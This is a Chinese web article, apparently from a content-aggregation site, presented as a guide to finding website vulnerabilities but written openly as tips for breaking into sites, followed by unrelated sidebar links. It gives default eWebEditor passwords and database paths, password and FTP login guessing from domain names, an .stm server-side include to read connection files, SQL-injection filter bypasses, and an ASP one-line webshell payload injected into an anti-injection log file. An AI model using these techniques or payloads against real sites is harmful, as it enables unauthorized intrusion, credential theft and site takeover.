当前位置:首页 > 生活 >

怎么扫描网站漏洞(网站手动漏洞挖掘具体操作)

来源:原点资讯(m.360kss.com)时间:2024-06-18 07:40:14作者:YD166手机阅读>>

1.例如我们的目标网址为“http://www.xxxx.cn/forum/index.php”那么我们把地址改为http://www.xxxx.cn/forum/index.PHP后再浏览看看是否存在页面,如果存在的话,则服务器所使用的系统为windows,如果显示不存在,则服务器很有可能使用的是*nix系统。

2. Ewebeditor编辑器获取站的新方法

Ewebeditor编辑器 大家应该是再熟悉不过的吧?我们找到后台登录的地方后,先用默认密码admin888登陆,不行就下载默认数据库‘/db/ewebeditor.mdb”,如果默认数据库也改了的话我们是不是就该放弃了呢?这里告诉大家我的经验!就是用密码admin999登陆,或者输入“/db/ewebeditor1013.mdb”就能下载到数据库了。这个方法有?的几率能拿下目标!

3. 社工的小技巧

在入侵的时候如果目标网站有论坛的话,我们可以试一下社工,例如一个网站是“www.xxxx.cn”, 管理员名称为admin,那么我们就可以试试用密码“xxxx”和“xxxx.cn”来登陆,这种方法最适合在入侵大型公司网站的时候使用!

4. 入侵时的思维拓展

有时候我们获得了目标网站的管理员密码,但是又找不到后台,这是可以试下用FTP登陆,例如,目标网站是”www.xxxx.cn “ 得到的密码为“bishi”,我们就可以试下用“xxxx”“xxxx.cn”www.xxxx.cn作为FTP 用户名,用“bishi”:作为FTP密码来进行登陆,成功的几率可以很大的哦!)

5. 入侵时获得管理员名称

有时候在入侵类似于新闻发布网的网站时,注入得到了管理员密码,但是拿不到管理员的名称,网站上也没有论坛什么的,这时候该怎么办呢?我们可以随便打开一个新闻,然后仔细找找诸如“提交者”“发布者”之类的字眼,一般“提交者”就是管理员的名称了。

6. 寻找管理员后台

有时候我们得到了管理员的账号和密码,但是却苦于找不到后台。这时候我们可以对着网站上的图片点右键,查看其属性。有时的确能找到后台的!

7 . 扫web绝对路径

众所周知,在入侵asp.net的网站时,我们首先就是在aspx文件前加上一个“~”来尝试扫出web的绝对路径,但在入侵用ASP IIS架设的网站时能不能用呢?答案是肯定的,但是有一定的技巧,假设目标网站的主页为 www.xxxxx/index.asp,我们可以尝试提交这样的网址www.xxxxx.cn/fkbhvv.aspx ,其中fkbhvv.aspx 是不存在的!这个方法的成功率大约是`. 家乐福的官方站就有这个漏洞。)

8. stm文件在入侵中的作用

当网站不允许上传 asp .. cer ..cdx . htr 等文件时,上传一个stm文件,代码为 “<!–#include file=”conn.asp”–>”(想查看什么文件就写什么文件名,这里我假设想查看的文件名为”conn.asp”),,然后直接打开这个 stm文件的地址,再查看源代码,“conn.asp”这个文件的代码就一览无遗了!

9. 注入的技巧

在找到一个网站可能存在注射漏洞的地址时(假设地址为www.xxxxxx/news.asp?id=6),我们通常会先提交一个单引号“’”来测试是否存在注射漏洞,但目前网上的通用防注入程序还是很多,所以很有可能会返回“XX通用防注入程序已阻止你试图进行的攻击!”注入此类消息框。这时我们除了可以尝试COOKIES注入之外,还可以把变量编码一下(如”www.xxxxx/news.asp?id=6”编程” www.xxxx.cn/news.aspid=6”)来进行注射,不行的话可以转换一下大小写(如“id”变成“ID”),或者转换大小写后再编码来进行注射等,总之想一些办法来把变量弄怪点,很多通用防注入程序都存在这写被绕过的缺陷!

10. 防注入程序拿shell

当你用单引号“’”来测试一个网站可能存在注入漏洞的地址时(假设网址为“www.xxxx/news.asp?id=6”)弹出了“你的操作已被记录!”这类信息,而我们又没办法去绕过防注入系统的时候,可以试着提交http://www.xxxx/sqlin.asp看看存不存在“sqlin.asp” ,如果存在的话,我们只要提交” http:// www.xxxx/news.asp?id=6′<%execute request(“a”)%>“ ,然后再用一句话木马客户端来连接http://www.xxxxx/sqlin.asp文件就行了,因为目前很多通用防注入程序都是用”sqlin.asp“这个文件名来做非法记录的数据库,而且大多数都没有防下载处理。

栏目热文

网站漏洞测试(网站漏洞检测系统)

网站漏洞测试(网站漏洞检测系统)

各类web应用充斥在我们的网络生活中,但是因为开发者安全意识不强而导致的安全问题同样层出不穷,毕竟仅仅依靠个人编写代码总...

2024-06-18 07:21:02查看全文 >>

怎么用sqlmap检测网站漏洞(sqlmap如何检测是否存在注入)

怎么用sqlmap检测网站漏洞(sqlmap如何检测是否存在注入)

概述最近官网被攻击了,渗透测试的同事反馈是存在sql注入方面的漏洞,所以用sqlmap工具也测了一下,仅供参考。官方网站...

2024-06-18 07:51:05查看全文 >>

如何检查网站漏洞(有什么软件可以检查网站漏洞)

如何检查网站漏洞(有什么软件可以检查网站漏洞)

在今天的数字时代,网站的安全性变得尤为重要。随着越来越多的人使用互联网来进行各种活动,包括购物、银行业务和社交媒体,网...

2024-06-18 07:34:12查看全文 >>

如何解决网站漏洞(网站漏洞有哪些)

如何解决网站漏洞(网站漏洞有哪些)

为什么很多网站系统都存在这个安全漏洞,这里面我所指的一些网站都是一些小公司的,或者是一些个人的网站系统,比如说像阿里、腾...

2024-06-18 07:17:50查看全文 >>

如何挖掘网站漏洞(网站渗透十种方法)

如何挖掘网站漏洞(网站渗透十种方法)

很多网友以及站长朋友们对漏洞挖掘这个词很陌生,在讲漏洞挖掘之前,大家应该对漏洞挖掘可能不是很熟,这里就是其实顾名思义就是...

2024-06-18 07:41:36查看全文 >>

怎么免费创建自己的网站平台(怎么免费创建一个自己的网站)

怎么免费创建自己的网站平台(怎么免费创建一个自己的网站)

不管是自己个人想搭建一个个人网站,还是自己作为公司官网改版的负责人,如何搭建一个网站,需要知道哪些知识,一定要先搞清楚,...

2024-06-18 07:19:05查看全文 >>

地震该怎样保护自己(如果地震来了要怎么保护自己)

地震该怎样保护自己(如果地震来了要怎么保护自己)

近日青海、云南两地地震牵动人心青海玛多县深夜发生7.4级地震西宁震感强烈中国地震台网正式测定:05月22日02时04分,...

2024-06-18 07:51:03查看全文 >>

win7怎么对一个文件夹加密(win7 怎么给指定的文件夹设置密码)

win7怎么对一个文件夹加密(win7 怎么给指定的文件夹设置密码)

现代数字时代,电脑文件的数据安全和隐私保护变得至关重要。无论是个人用户还是企业,确保文件免受未经授权的访问是首要任务。文...

2024-06-18 07:37:43查看全文 >>

win7怎么加密文件夹

win7怎么加密文件夹

  一般情况下,担心电脑的重要信息和文档内容被别人查看或者不小心泄密出去,所以我们要设置密码保护这些资源。平常我们所见的...

2024-06-18 07:38:17查看全文 >>

月经后第几天减肥最快的方法(月经后第几天是安全期)

月经后第几天减肥最快的方法(月经后第几天是安全期)

经过研究发现月经完成后的7到14天是瘦身的超快速时期,因为此阶段大量的雌性激素分泌,不仅会让身心愉悦,同时也能活跃身体上...

2024-06-18 07:45:19查看全文 >>

文档排行